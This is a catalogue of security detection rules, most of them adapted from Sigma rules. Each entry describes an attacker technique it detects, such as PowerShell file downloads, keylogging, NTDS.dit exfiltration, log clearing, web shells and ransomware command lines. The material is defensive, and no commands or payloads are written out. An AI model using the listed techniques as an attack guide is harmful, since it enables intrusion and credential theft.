Rule Potential Svchost Memory Access Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service. Based on the Suspect Svchost Memory Asccess Sigma rule by Tim Burrell.

Used under Detection Rule License 1.1.

Rule Potential System DLL Sideloading From Non System Locations Detects DLL sideloading of DLLs usually located in system locations, such as System32, or SysWOW64. Based on the System DLL Sideloading From Non System Locations Sigma rule by Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), and XForceIR (SideLoadHunter Project).

Used under Detection Rule License 1.1.

Rule Potential TinyTurla Activity Detects TinyTurla activity that uses a fake DLL called w64time.dll. The Windows legit version is w32time.dll, which makes the malware less noticeable.
Rule Potential Turla Recon Activity Detects a common Turla activity which executes several reconnaissance commands to discover about the victim machine and also to move across laterally.
Rule Potential Unix Shell Command and Scripting Interpreter Detects triggers when suspicious shell commands or program code that may be executed for command and scripting interpreters.
Rule Potential Web Shell Dropped Detects potential web shells dropped. Based on the Suspicious ASPX File Drop by Exchange Sigma rule by Florian Roth (rule), MSTI (query, idea).

Used under Detection Rule License 1.1.

Rule Potential WinAPI Calls Via PowerShell Scripts Detects use of WinAPI Functions in PowerShell scripts. Based on the Potential WinAPI Calls Via PowerShell Scripts Sigma rule by Nikita Nazarov, oscd.community, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Potential Windows Command Shell Interpreter Triggers when the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking. Based on the Cmd.exe CommandLine Path Traversal Sigma rule by xknow @xknow_infosec, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Potential Windows Scheduled Task Creation Triggers when adversaries attempts to create a scheduled task.
Rule Potential Windows Software Discovery Triggers when a windows software is discovered. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software with a vulnerability.
Rule PowerShell DownloadFile Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line. Based on the PowerShell DownloadFile Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule PowerShell Profile Modification Triggers when a powershell profile is created or modified which could indicate suspicious activity as the profile can be used as a mean of persistence. Based on the PowerShell Profile Modification Sigma rule by HieuTT35, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Powershell Keylogging Activity Detects Powershell keylogging activity. Based on the Powershell Keylogging Sigma rule by frack113.
Rule Powershell Local Email Collection Detects adversaries targeting user email on local systems to collect sensitive information. Based on the Powershell Local Email Collection by frack113.

Used under Detection Rule License 1.1.

Rule Powershell Remote Thread Creation Detects Powershell injecting code into critical Windows processes.
Rule Process Injection via Maldoc Detects process injection using maldoc. Based on the LittleCorporal Generated Maldoc Injection Sigma rule by Christian Burkard.

Used under Detection Rule License 1.1.

Rule Psexec Accepteula Agreement Detected Detects psexec accepteula activity. Based on the Psexec Accepteula Condition Sigma rule by omkar72.

Used under Detection Rule License 1.1.

Rule Python Core Image Load Detected Detects Python Core image load. Based on the Python Py2Exe Image Load Sigma rule by Patrick St. John, and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule Python Py2Exe Image Load Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. Based on the Python Py2Exe Image Load Sigma rule by Patrick St. John, and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule RDP Communication over Loopback Address Detects RDP communication over loopback address. Based on the RDP over Reverse SSH Tunnel WFP Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Reconnaissance Activity Using BuiltIn Commands Detects the execution of a set of builtin commands often used in recon stages by different attack groups. Based on the Quick Execution of a Series of Suspicious Commands Sigma rule by juju4.

Used under Detection Rule License 1.1.

Rule Regedit Started with TrustedInstaller Privileges Detects regedit started with TrustedInstaller privileges or with ProcessHacker.exe. Based on the Regedit as Trusted Installer Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Registry Modification of Run Keys Detects registry modification of run keys. Based on the Suspicious Driver Install by pnputil.exe Sigma rule by Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, and Austin Songer @austinsonger.

Used under Detection Rule License 1.1.

Rule Regsvr32 Outbound Network Connection Detects outbound connections initiated by regsvr32.exe.
Rule Remote PowerShell Session Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account. Based on the Remote PowerShell Session (Network) Sigma rule by Roberto Rodriguez (@Cyb3rWard0g).

Used under Detection Rule License 1.1.

Rule Remote Scheduled Task Creation Detects remote scheduled task creations.
Rule Remote Service Activity via SVCCTL Named Pipe Detects remote service activity via remote access to the svcctl named pipe. Based on the Remote service creation via named pipes Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule Remote Thread Creation in Suspicious Targets Detects a remote thread creation in suspicious target images. Based on the Remote Thread Creation in Suspicious Targets by Florian Roth.

Used under Detection Rule License 1.1.

Rule Root Certificate Installed Detects adversaries installing a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Rule RunDLL32 Outbound Network Connection Detects outbound connections initiated by rundll32.exe.
Rule Rundll32 with Suspicious Process Lineage Detects executions of rundll32.exe from unusual parent processes.
Rule Running of Hijacked Binary Detected Detects running of hijacked binary. Based on the Using SettingSyncHost.exe as LOLBin Sigma rule by Anton Kutepov, and oscd.community.

Used under Detection Rule License 1.1.

Rule Ryuk Ransomware Command Line Activity Detected Detects Ryuk ransomware command line activity. Based on the Ryuk Ransomware Command Line Activity Sigma rule by Vasiliy Burov.

Used under Detection Rule License 1.1.

Rule SMB Create Remote File Admin Share Detects non-system accounts SMB accessing a file with write (0x2) access mask via administrative share such as C$. Based on the SMB Create Remote File Admin Share Sigma rule by Jose Rodriguez (@Cyb3rPandaH), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule SSH Firewall Configuration Detects SSH firewall configuration. Based on the OpenSSH server firewall configuration on Windows (command) Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule Script Initiated Connection Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads. Based on the Script Initiated Connection Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Service Dll Hijacking Detects changes to the ServiceDLL value related to a service in the registry. This is often used as a method of persistence. Based on the ServiceDll Hijack Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Service Registry Permissions Weakness Check Detects adversaries checking for flaws in permissions inside the registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Based on the Service Registry Permissions Weakness Check Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule SetupComplete.cmd Exploitation Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd.
Rule Shadow Copies Creation Using Operating Systems Utilities Detects possible scenarios of credential access where shadow copies are crated using operating systems utilities. Based on the Shadow Copies Creation Using Operating Systems Utilities Sigma rule by Teymur Kheirkhabarov, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule Shells Spawned by Web Servers Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack. Based on the Shells Spawned by Web Servers Sigma rule by Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Snatch Ransomware Activity Detected Detects Snatch ransomware activity. Based on the Snatch Ransomware Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule Static Mimikatz Driver Name Detected Detects known exploited mimikatz driver names. Based on the PrinterNightmare Mimikatz Driver Name Sigma rule by Markus Neis, @markus_neis, and Florian Roth.

Used under Detection Rule License 1.1.

Rule Steganography Embedding Files Detects embedding of steganography files. Based on the Steganography Unzip Hidden Information From Picture File Sigma rule by Pawel Mazur.

Used under Detection Rule License 1.1.

Rule Steganography Extracting Files Detects extraction of steganography files. Based on the Steganography Extract Files with Steghide Sigma rule by Pawel Mazur.

Used under Detection Rule License 1.1.

Rule Steganography with RAR Detects a privilege escalation attempt via a rogue Windows directory environment variable. Based on the Suspicious Greedy Compression Using Rar.EXE Sigma rule by X__Junior (Nextron Systems), and Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Behavior by SOURGUM Actor Detects suspicious behavior by SOURGUM actor.
Rule Suspicious Binary DLL Execution Triggers when a DLL is executed from a specified directory.
Rule Suspicious Binary Load and Execution Triggers when an arbitrary DLL is loaded or executed from a specified binary.
Rule Suspicious CLR Logs Creation Detects suspicious .NET assembly executions. Based on the Suspicious CLR Logs Creation Sigma rule by omkar72, oscd.community, and Wojciech Lesicki.

Used under Detection Rule License 1.1.

Rule Suspicious Changing of User Agent Detects a suspicious changing of user agent. Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
Rule Suspicious Copy Command from Admin Share Detects suspicious copy command from admin share. Based on the Copy from Admin Share Sigma rule by Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Suspicious Creation of Get-Variable File Detects suspicious creation of get-variable.exe file. Based on the Suspicious Get-Variable.exe Creation Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious Cron Scheduled Task/Job Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code.
Rule Suspicious Curl Download Detects a suspicious curl process start on Windows and outputs the requested document to a local file. Based on the Suspicious Curl.EXE Download Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Double File Extension Process Detects processes with double file extensions. Based on the Suspicious Double Extension File Execution Sigma rule by Florian Roth (Nextron Systems), @blu3_team (idea), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Elevated System Shell Triggers when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges. Based on the Suspicious Elevated System Shell Sigma rule by frack113, and Tim Shelton.

Used under Detection Rule License 1.1.

Rule Suspicious EventLog Cleared Detects clearing of event logs using wevtutil, powershell and wmic.
Rule Suspicious Execution of GRP File Conversion Detects suspicious execution of .grp file conversion. Based on the Suspicious GrpConv Execution Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Execution of Outlook from Temporary Directory Detects Outlook executed from a temporary directory. Based on the Execution in Outlook Temp Folder Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Execution with Colorcpl Detects suspicious execution of colorcpl.exe. Based on the Suspicious Creation with Colorcpl Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious File Created by Office Application Detects executable and script file creation by Microsoft Office applications. Based on the Created Files by Office Applications Sigma rule by Vadim Khrykov (ThreatIntel), and Cyb3rEng (Rule).

Used under Detection Rule License 1.1.

Rule Suspicious File Download Using Office Application Detects the usage of Microsoft Word, Microsoft Excel, or Microsoft PowerPoint being used to download arbitrary files. Based on the Suspicious File Download Using Office Application Sigma rule by Beyu Denis, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious Get-Variable Creation Detects PowerShell Persistence via hijacking Get-Variable.exe. Based on the Suspicious Get-Variable.exe Creation Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious GetTypeFromCLSID ShellExecute Detects suspicious Powershell code that execute COM Objects. Based on the Suspicious GetTypeFromCLSID ShellExecute Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious Group And Account Reconnaissance Activity Detects suspicious reconnaissance command line activity on Windows systems.
Rule Suspicious Host File Deletion Activity Triggers when host files are deleted from a system.
Rule Suspicious In-Memory Module Execution Detects process access events by suspicious processes which have reflectively loaded libraries in their memory space. Based on the Suspicious In-Memory Module Execution Sigma rule by Perez Diego (@darkquassar), oscd.community, and Jonhnathan Ribeiro.

Used under Detection Rule License 1.1.

Rule Suspicious Linux Log Cleared Triggers when attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion. Based on the Clear Linux Logs Sigma rule by Ömer Günal, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious Mac System Log Cleared Triggers when a local audit log is deleted. Based on the Indicator Removal on Host - Clear Mac System Logs Sigma rule by remotephone, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious Microsoft OneNote Child Process Detects suspicious Microsoft Onenote child process spawned. Based on the Suspicious Microsoft OneNote Child Process Sigma rule by Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), and Elastic (idea).

Used under Detection Rule License 1.1.

Rule Suspicious NTDS Process Patterns Exfiltration Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file. Based on the NTDS.DIT Creation By Uncommon Process Sigma rule by Florian Roth (Nextron Systems), and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious NTDS Process Writes Detects suspicious process patterns used in NTDS.DIT exfiltration. Based on the Suspicious Process Patterns NTDS.DIT Exfil Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious New Instance of an Office COM Object Detects a Microsoft Office application creating an instance of one of the Office COM objects such as Word.Application, or Excel.Application. This can be used by malicious actors to create malicious Office documents with macros on the fly. Based on the Suspicious New Instance Of An Office COM Object by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Outbound SMTP Connections Detects potential exfiltration over SMTP protocol. Based on the Suspicious Outbound SMTP Connections Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious PowerShell Keywords Detects keywords that could indicate the use of some PowerShell exploitation framework. Based on the Potential Suspicious PowerShell Keywords Sigma rule by Florian Roth (Nextron Systems), Perez Diego (@darkquassar), and Tuan Le (NCSGroup).

Used under Detection Rule License 1.1.

Rule Suspicious Process Discovery With Get-Process Detects adversaries performing discovery to get the processes that are running on the local computer. Based on the Suspicious Process Discovery With Get-Process Sigma rule by frack113.

Used under Detection Rule License 1.1.

Rule Suspicious Process from Microsoft HTML Help Detects suspicious process spawned from Microsoft HTML Help. Based on the HTML Help HH.EXE Suspicious Child Process Sigma rule by Maxim Pavlunin, and Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Program Location with Network Connections Detects programs with network connections running in suspicious files system locations. Based on the Suspicious Program Location with Network Connections by Florian Roth.

Used under Detection Rule License 1.1.

Rule Suspicious Proxy Binary Execution Triggers when a system binary is executed from a proxy.
Rule Suspicious PsExec Activity Detects suspicious PsExec activity. Based on the Impacket PsExec Execution Sigma rule by Bhabesh Raj.

Used under Detection Rule License 1.1.

Rule Suspicious Remote Named Pipe Detects lateral movement and remote execution scenarios using newly observed named pipes accessed remotely. Based on the First Time Seen Remote Named Pipe Sigma rule by Samir Bousseaden.

Used under Detection Rule License 1.1.

Rule Suspicious Scheduled Task Detects suspicious scheduled task creation or update events based on attributes such as paths, or commands line flags. Based on the Suspicious Scheduled Task Creation by Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Suspicious Scripting in a WMI Consumer Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers. Based on the Suspicious Scripting in a WMI Consumer Sigma rule by Florian Roth (Nextron Systems), and Jonhnathan Ribeiro.

Used under Detection Rule License 1.1.

Rule Suspicious Subprocess from RazerInstaller Detects suspicious subprocess from RazerInstaller.exe. Based on the Suspicious RazerInstaller Explorer Subprocess Sigma rule by Florian Roth, and Maxime Thiebaut.

Used under Detection Rule License 1.1.

Rule Suspicious Svchost Execution Anomaly Detects the svchost.exe executed without any CLI arguments which is normally observed when a malicious process spawns the process and injects code into the process memory space. Based on the Suspect Svchost Activity Sigma rule by David Burkett, and @signalblur.

Used under Detection Rule License 1.1.

Rule Suspicious TCP Tunnel Via PowerShell Script Detects PowerShell scripts that creates sockets/listeners which could be indicative of tunneling activity. Based on the Suspicious TCP Tunnel Via PowerShell Script Sigma rule by Nasreddine Bencherchali (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Suspicious Valid Accounts Logon Triggers when a suspicious login from a valid account is detected.
Rule Suspicious WMIC Execution Detects WMIC executing suspicious or recon commands. Based on the Suspicious WMIC Execution Sigma rule by Michael Haag, Florian Roth, juju4, and oscd.community.

Used under Detection Rule License 1.1.

Rule Suspicious WebDav Client Execution Detects exfiltration attempts or use of WebDav to launch code hosted on a WebDav Server. Based on the WebDav Client Execution Sigma rule by Roberto Rodriguez (Cyb3rWard0g), and OTR (Open Threat Research).

Used under Detection Rule License 1.1.

Rule Symlink to passwd Created Detects symlink created to the /etc/passwd directory. Based on the Symlink Etc Passwd Sigma rule by Florian Roth.

Used under Detection Rule License 1.1.

Rule System Owner or User Discover (Linux) Detects system owner or user discovery activities. Based on the System Owner or User Discovery Sigma rule by Timur Zinniatullin, and oscd.community.

Used under Detection Rule License 1.1.

Rule System Owner or User Discovery (Windows) Detects system owner or user discovery activities. Based on the Local Accounts Discovery Sigma rule by Timur Zinniatullin, Daniil Yugoslavskiy, and oscd.community.

Used under Detection Rule License 1.1.

Rule System Time Discovery Activity Detects system time discovery activity.
Rule Token Impersonation via PowerShell Detects adversaries leveraging Windows API functions related to token impersonation or theft.
Rule Transferring Files with Credential Data via Network Shares Detects attempts to transfer files with well-known filenames, such as sensitive files with credential data, using network shares. Based on the Transferring Files with Credential Data via Network Shares Sigma rule by Teymur Kheirkhabarov and oscd.community.

Used under Detection Rule License 1.1.

Rule Turla Service Installed Triggers when a malicious service known by a malicious APT is installed.
Rule UAC Remote Restrictions Disabled Detects registry modification allowing remote administrative actions. Based on the Disable UAC Remote Restriction Sigma rule by Steven Dick, Teoderick Contreras, and Splunk.

Used under Detection Rule License 1.1.

Rule Uncommon Process Spawned from HWP Detects uncommon processes spawning from Hangul Word Processor (Hanword). Based on the Suspicious HWP Sub Processes Sigma rule by Florian Roth (Nextron Systems).

Used under Detection Rule License 1.1.

Rule Unusual Child Process from Different Processes Detects unusual child process from different processes. Based on the Abused Debug Privilege by Arbitrary Parent Processes Sigma rule by Semanur Guneysu @semanurtg, and oscd.community.

Used under Detection Rule License 1.1.

Rule User Authenticating via Multiple Explicit Credentials Detects a user attempting to authenticate with multiple target users using explicit credentials.
Rule User Creation Abusing Fortinet Vulnerability Detects user creation by abusing Fortinet vulnerability. Based on the Fortinet APT group abuse on Windows (user) Sigma rule by mdecrevoisier.

Used under Detection Rule License 1.1.

Rule VBA DLL Loaded Via Office Application Detects VB DLLs loaded by a Microsoft Office application, which could indicate the presence of VBA Macros. Based on the VBA DLL Loaded Via Office Application Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

Rule VirtualBox Driver Installed or Started Detects VirtualBox driver installation or a start of virtual machines. Based on the Detect Virtualbox Driver Installation OR Starting Of VMs Sigma rule by Janantha Marasinghe.

Used under Detection Rule License 1.1.

Rule Vulnerable Driver Loaded Triggers when a vulnerable driver is loaded. Based on the Windows Vulnerable Driver Loaded Sigma rule by Michael Haag, and Splunk.

Used under Detection Rule License 1.1.

Rule WMI Event Consumer Persistence Detects WMI command line event consumers. Based on the WMI Persistence - Command Line Event Consumer Sigma rule by Thomas Patzke.

Used under Detection Rule License 1.1.

Rule WScript or CScript Dropping File Detects a file ending in jse, vbe, js, vba, or vbs being written by cscript.exe or wscript.exe. Based on the WScript or CScript Dropper - File Sigma rule by Tim Shelton.

Used under Detection Rule License 1.1.

Rule Windows Event Logging Disabled Via Registry Detects tampering with the 'Enabled' registry key in order to disable windows logging of a windows event channel. Based on the Disable Windows Event Logging Via Registry Sigma rule by frack113, and Nasreddine Bencherchali.

Used under Detection Rule License 1.1.

Rule Windows Registry Trust Record Modification Detects Windows registry trust record modification. Based to the Windows Registry Trust Record Modification Sigma rule by Antonlovesdnb.

Used under Detection Rule License 1.1.

(Back to top)